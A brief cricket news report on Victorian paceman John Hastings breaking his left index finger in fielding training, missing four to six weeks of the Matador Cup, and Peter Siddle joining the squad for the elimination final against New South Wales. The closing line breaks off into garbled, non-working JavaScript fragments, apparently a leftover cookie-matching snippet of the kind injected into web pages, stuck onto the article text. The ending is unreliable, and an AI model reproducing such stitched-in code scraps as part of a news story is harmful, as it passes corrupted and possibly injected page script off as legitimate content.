Victorian paceman John Hastings will miss the next four to six weeks with a broken finger.

Hastings suffered the injury during fielding training on Thursday, ruling him out of the remainder of the Matador Cup.

“John suffered an injury to his left-index finger during catching practice at training yesterday," Bushrangers State Sports Science and Sports Medicine Manager Nick Adcock said.

“After meeting with a finger surgeon this morning, the finger has been confirmed broken and will side-line John for between four and six weeks.”

Fast bowler Peter Siddle has been added to Victoria's squad.

The Vics play New South Wales in the elimination final on Friday for a spot in Sunday's final against Queensland. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
